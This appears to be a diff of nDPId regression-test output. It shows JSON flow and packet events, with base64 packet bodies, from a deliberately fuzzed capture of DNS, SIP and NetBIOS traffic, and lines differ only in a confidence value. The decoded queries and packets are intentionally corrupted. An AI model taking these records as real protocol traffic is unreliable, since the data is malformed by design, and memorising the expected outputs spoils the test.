{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1120469680188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469680188,"pkt":"ADBUADRWAODtAW69CABFAAHvac4AAIARF3DAqAEC1PIhIxPEE8QB29MsUkVHSVN0RVIgcGlwOnNpcC5jeWJlcmO3dHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4DjEuMjticmFuY2g9ejloRzRiS24lcwAwNTIwMTk5LTQ4OWQ1MjBmMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAw2lwLnB5YmVyY2l0eS5kaz47dGFnPTg2MDJiMTQNClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlGOiA1NzgyMjI3MjktNGs2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDcwIFJFR0lTVEVSDQpDb25mZW50LUxlbmd0aDogMA0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469680447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1120469680447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469680447,"pkt":"ADBUADRWAODtAW69CABFAABIRc8AAIARTYLAqAECwKgBAQqkJXMANFNK1tYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1120469681446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469681446,"pkt":"ADBUADRWAODtAW69CABFAABIadAAAIARTYHAqAECwKgBAQqkADUANFNK1tYBAAABAAB2AAAABF9zaXAEX3VkcAMlcwAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469681446,"flow_last_seen":1120469681446,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469681446,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2403,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1120469683449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469683449,"pkt":"ADBUADRWAODtAW69CABFAABIYdEAAIARTYDAqAECwKgBAQqkADUANFNK1tYBAAABAAAAAAAABF9zaXAGX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAQE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469681446,"flow_last_seen":1120469683449,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469683449,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469685131,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1120469685131,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469685131,"pkt":"\/\/\/\/\/\/\/\/AOB2AW69CABFAABOadMAAIARTHrAqAECwKgB\/wCJY4kAOls4hPQBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUN1NEFDQUJNAHEgAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1120469685452,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469685452,"pkt":"ADBUPzRWAODtAW69CABFAABIadQAAIARTX3AqAECwKgRAQqkADUANFNK1tYBAAABAAAAAAAABF96aXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1120469689458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469689458,"pkt":"ADBUADRWAODtAW69CABFAABIadYAAIARXXvAqAECwKgBAQqkADUANFNK1tYBAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1120469697460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469697460,"pkt":"ADBUADRWAODtAW69CABFAABEadcAAIARTX7AqAECwKgBAQqlADUAMORCQNcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1120469697462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469697462,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqUAR8a+QNeAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAxWAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1120469697466,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469697466,"pkt":"ADBUADRWAODtAW69CABFAAA+adiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1120469697468,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469697468,"pkt":"AODtAW69ADBUADRWCABFAABOAABAAEARt0vAqAEuwKgBAgA1CqYAOqrT7deBAAABAAEAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQAAJxAABNTyISM="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":499,"global_ts_msec":1120469697621} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":533,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":533,"pkt_l4_len":0,"thread_ts_msec":1120469697469,"pkt":"AODtAW69ADBUADRWCABFAAIHAAD6ADcRiibU8iEjwKgBAhPEE8QB877qU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDcxIFJFR0lTVEVSDQpGcm9tOiA8c2lwNXZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04fTVhMDBkDQpUbzIgPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWIwNjctMzIwYWQyZGEzDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTluNzA7cnBvZnQ9NTA2MDticmFuY2g9ejloRzRiS25wMTM4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469540839,"flow_last_seen":1120469733221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469733221,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 